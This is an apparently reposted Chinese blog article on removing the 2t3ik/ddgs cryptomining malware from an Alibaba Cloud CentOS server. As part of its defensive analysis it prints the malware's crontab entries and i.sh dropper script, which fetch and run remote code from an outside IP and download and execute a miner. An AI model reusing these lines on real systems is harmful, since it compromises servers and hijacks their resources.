阿里云centos上处理2t3ik与ddgs病毒

2024-08-28 00:58

本文主要是介绍阿里云centos上处理2t3ik与ddgs病毒,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

阿里云centos上处理2t3ik与ddgs病毒

 

有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示

系统centos

由于我是新手,点了半天也没有免费的修复的按钮,而且升级企业版才可以查看,穷屌丝一个,升级企业版是不可能得到……

于是我就没有管它。

今天有时间登陆阿里云服务器看看什么情况,使用xshell连接,输入命令时候一卡一卡的,我还以为是xshell的问题呢,于是我还了putty登陆,还是一样,输入一个字母都卡半天,这就表明不是xshell的问题了,耐着性子输入top命令以查看,有个2t3ik.p的进程占用着99%多的CPU使用率,我赶紧把这个进程杀了,嗯,这下用着不卡了。

可是还没有等到半分钟,又开始一卡一卡的,继续使用top命令一看,还是这个2t3ik.p,只不过换了个PID

我也不知道这个进程是干什么的,可是不管这个是什么作用的进程让我的服务器卡顿我都要杀掉,于是我就百度搜索了这个进程,遗憾的是在百度上2t3ik.p这个关键字搜不到什么相关的信息

百度不行那我上阿里云官网看看有什么解决的办法,很遗憾,找不到,那我就谷歌吧,说起来还是谷歌好,虽然相关结果不多,也是让我找到线索处理这个2t3ik.p进程了,这个进程文件在/tmp目录下

于是把这个2t3ik.p文件删除,可是没过过一分钟又出现了这个文件,阿里云的管理台上提示出现异常文件文件下载

然后我吧这个文件删除掉,在新建一个2t3ik.p文件,不给权限,2t3ik.p进程是没有了,却又出现2t3ik.m这个进程

在/tmp文件夹下有2t3ik.m这个文件

想到过给/tmp文件夹添加不可修改的权限,觉得不大现实,因为以后这个文件夹会用到

那么把所有让所有以2t3ik开头的文件不给修改权限

使用命令

chattr +i 2t3ik*

chattr +i ddgs*

搞定,再也没有2t3ik的进程了

再也没有恼人的2t3ik病毒了

PS:阿里云的aliyundun真的不管用,对这个进程竟然防不了

PPS:阿里云对异常处理竟然还要升级企业版才能查看与一键处理,我一介屌丝哪来这个闲钱去升级啊

 

 

 

2t3ik与ddgs挖矿病毒处理

一、问题现象 

朋友的阿里云LINUX服务器, 发现有2t3ik与ddgs两个异常进程,把CPU几乎耗尽了。其描述kill掉以后,过一会儿又会重新出现。 

2t3ik_worm

二、分析处理

即然kill 后过一会儿又会出现,那就有两种可能:1、crontab定时调用;2、有守护进程,个别病毒还会修改ps和top,通过这些命令无法查看到隐藏的守护进程。先看了下crontab,发现如下两条内容:

 

 
  1. */5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
  2. */5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本,发现内容如下:

 

 
  1. export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
  2. echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
  3. echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
  4. mkdir -p /var/spool/cron/crontabs
  5. echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
  6. echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
  7. if [ ! -f "/tmp/ddgs.3011" ]; then
  8. curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
  9. fi
  10. chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
  11. ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
  12. ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
  13. ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
  14. ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
  15. ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
  16. ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

简单的一个shell 脚本,前面是创建crontab定时任务,后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。

删除crontab内容,并kill 掉相关进程后,观察一段时间发现其不再重新出现。问题解决。当然,为避免其后面再出现,可以做以下预防操作:

 

 
  1. cd /tmp/
  2. rm -rf 2t3ik.p
  3. rm -rf ddgs.3011
  4. touch 2t3ik.p
  5. touch ddgs.3011
  6. chattr +i 2t3ik*
  7. chattr +i ddgs*

 

三、产生原因

网上也找了下该病毒的相关信息,了解到其一般是由于安装了redis后,未设置密码或密码太过简单,导致的被入侵。redis密码修改方法如下:

 

 
  1. redis-cli -h 127.0.0.1 -p 6379
  2. config get requirepass //获取当前密码
  3. config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认,即无密码;

永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:

 
  1. requirepass yourpassword //此处注意,行前不能有空格

另外,平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具,定期做扫描。

 

这篇关于阿里云centos上处理2t3ik与ddgs病毒的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


原文地址:
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.chinasem.cn/article/1113282

相关文章

Python使用vllm处理多模态数据的预处理技巧

《Python使用vllm处理多模态数据的预处理技巧》本文深入探讨了在Python环境下使用vLLM处理多模态数据的预处理技巧,我们将从基础概念出发,详细讲解文本、图像、音频等多模态数据的预处理方法,... 目录1. 背景介绍1.1 目的和范围1.2 预期读者1.3 文档结构概述1.4 术语表1.4.1 核

Spring Boot @RestControllerAdvice全局异常处理最佳实践

《SpringBoot@RestControllerAdvice全局异常处理最佳实践》本文详解SpringBoot中通过@RestControllerAdvice实现全局异常处理,强调代码复用、统... 目录前言一、为什么要使用全局异常处理?二、核心注解解析1. @RestControllerAdvice2

Python实现对阿里云OSS对象存储的操作详解

《Python实现对阿里云OSS对象存储的操作详解》这篇文章主要为大家详细介绍了Python实现对阿里云OSS对象存储的操作相关知识,包括连接,上传,下载,列举等功能,感兴趣的小伙伴可以了解下... 目录一、直接使用代码二、详细使用1. 环境准备2. 初始化配置3. bucket配置创建4. 文件上传到os

电脑提示xlstat4.dll丢失怎么修复? xlstat4.dll文件丢失处理办法

《电脑提示xlstat4.dll丢失怎么修复?xlstat4.dll文件丢失处理办法》长时间使用电脑,大家多少都会遇到类似dll文件丢失的情况,不过,解决这一问题其实并不复杂,下面我们就来看看xls... 在Windows操作系统中,xlstat4.dll是一个重要的动态链接库文件,通常用于支持各种应用程序

SQL Server数据库死锁处理超详细攻略

《SQLServer数据库死锁处理超详细攻略》SQLServer作为主流数据库管理系统,在高并发场景下可能面临死锁问题,影响系统性能和稳定性,这篇文章主要给大家介绍了关于SQLServer数据库死... 目录一、引言二、查询 Sqlserver 中造成死锁的 SPID三、用内置函数查询执行信息1. sp_w

Java对异常的认识与异常的处理小结

《Java对异常的认识与异常的处理小结》Java程序在运行时可能出现的错误或非正常情况称为异常,下面给大家介绍Java对异常的认识与异常的处理,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参... 目录一、认识异常与异常类型。二、异常的处理三、总结 一、认识异常与异常类型。(1)简单定义-什么是

Golang 日志处理和正则处理的操作方法

《Golang日志处理和正则处理的操作方法》:本文主要介绍Golang日志处理和正则处理的操作方法,本文通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考... 目录1、logx日志处理1.1、logx简介1.2、日志初始化与配置1.3、常用方法1.4、配合defer

springboot加载不到nacos配置中心的配置问题处理

《springboot加载不到nacos配置中心的配置问题处理》:本文主要介绍springboot加载不到nacos配置中心的配置问题处理,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑... 目录springboot加载不到nacos配置中心的配置两种可能Spring Boot 版本Nacos

CentOS 7 YUM源配置错误的解决方法

《CentOS7YUM源配置错误的解决方法》在使用虚拟机安装CentOS7系统时,我们可能会遇到YUM源配置错误的问题,导致无法正常下载软件包,为了解决这个问题,我们可以替换YUM源... 目录一、备份原有的 YUM 源配置文件二、选择并配置新的 YUM 源三、清理旧的缓存并重建新的缓存四、验证 YUM 源

python web 开发之Flask中间件与请求处理钩子的最佳实践

《pythonweb开发之Flask中间件与请求处理钩子的最佳实践》Flask作为轻量级Web框架,提供了灵活的请求处理机制,中间件和请求钩子允许开发者在请求处理的不同阶段插入自定义逻辑,实现诸如... 目录Flask中间件与请求处理钩子完全指南1. 引言2. 请求处理生命周期概述3. 请求钩子详解3.1